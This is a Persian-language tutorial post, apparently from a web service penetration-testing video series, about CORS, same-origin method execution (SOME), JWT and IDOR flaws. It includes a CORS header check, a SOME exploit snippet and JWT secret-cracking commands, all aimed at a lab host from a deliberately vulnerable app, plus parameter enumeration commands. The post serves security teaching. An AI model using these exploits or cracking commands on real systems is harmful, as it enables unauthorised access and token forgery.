آسیب پذیری های CORS,SOME,JWT,IDOR در وبسرویس ها


در قسمت آخر سری آموزش های تصویری تست نفوذ وبسرویس ها این قسمت با یک سری دیگر از آسیب پذیری های رایج در وبسرویس مثل CORS و SOME و JWT و IDOR آشنا می شویم.

آسیب پذیری هایی که این این قسمت می خواهیم درباره آن صحبت کنیم بسیار مرسوم است.

برای تست CORS می توانید از روش های زیر هم استفاده نمایید.

۱-وبسایت test-cors.org

۲-اسکریپت زیر

#@merwan
curl -I -X OPTIONS \
  -H &quotOrigin: ${MY_URL}&quot \
  -H 'Access-Control-Request-Method: GET' \
  &quot${MY_URL}/SOMETHING&quot 2>&1 | grep -i 'Access-Control-Allow-Origin'

۳-اسکنر corsy

python3 corsy.py -i /path/urls.txt

برای تست و اکسپلویت SOME

۱-وبسایت someattack

۲-کد زیر برای اکسپلویت

<button =&quotsome()&quot>Evil Click</button>

function some() {
	open(&quothttp://soap.vul/dvws/vulnerabilities/some/token_generator.php?&mycallback=window.opener.alert(1);<\/script>¶m1=retrievetoken¶m2=dvwsuser¶m3=some&_=1591253461719&quot);
  setTimeout('location=&quothttp://soap.vul/dvws/vulnerabilities/some/&quot')
}

استفاده شد.

برای تست jwt

۱-وبسایت jwt.io

۲-ابزار c-jwt-cracker و crackjwt و jwt-cracker برای کرک

./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE

یا

crackjwt.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE dictionary.txt

یا

jwt-cracker &quoteyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ&quot &quotabcdefghijklmnopqrstuwxyz&quot 6

همچنین برای تست idor و access control ها می توانیم ابتدا کلیه پارامتر هارا با Paramspider

و یا ابزار های enumeration کلیه پارامتر ها و endpoint ها شناسایی و به ترتیب درجه اهمیت، idor را تست نماییم.

python3 paramspider.py --domain soap.vul

ابزار دیگر برای تست خودکار HUNT است که می توانید با نصب آن در burp از آن استفاده کنید.

در این قسمت تا اسلاید ۲۳ پیش رفتیم.

اگر مشکلی در دسترسی به فیلم داشتید می توانید از dideo استفاده کنید.


پیشاپیش از کم و کاستی ها این آموزش عذرخواهی می کنم.

امید است با نظرات شما روز به روز به کیفیت آموزش ها افزوده شود.